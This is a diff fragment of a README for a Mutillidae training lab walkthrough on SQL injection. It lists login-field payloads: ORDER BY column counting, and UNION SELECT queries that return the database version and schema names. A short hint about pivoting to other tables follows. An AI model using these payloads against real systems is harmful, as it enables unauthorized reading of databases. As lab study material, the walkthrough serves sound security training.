anb100/mutillidae/README.md

    [] The $ is located where the injection is to put in (' ORDER BY 7 #) end with a hashtag for comment the *and password* .
    [] ![obtenerColumnas](https://github.com/anb100/mutillidae/blob/main/screenshots_/Lab%209%20Walkthrough/numero%20de%20columnas.png)
    </p>
+   [] Username: ' UNION SELECT 1,@@VERSION,3,4,5,6,7 -- -
+   This show the version of this database
+   [] Username: ' UNION SELECT 1,SCHEMA_NAME,3,4,5,6,7 FROM information_schema.schemata  -- -
+   Show the tables in database

   - __Lab 10 : SQL Injection - Pivoting with SQL iNjection__
 Hint : It is possible to use SQL injection on the User Info page to access other database tables besides the user database table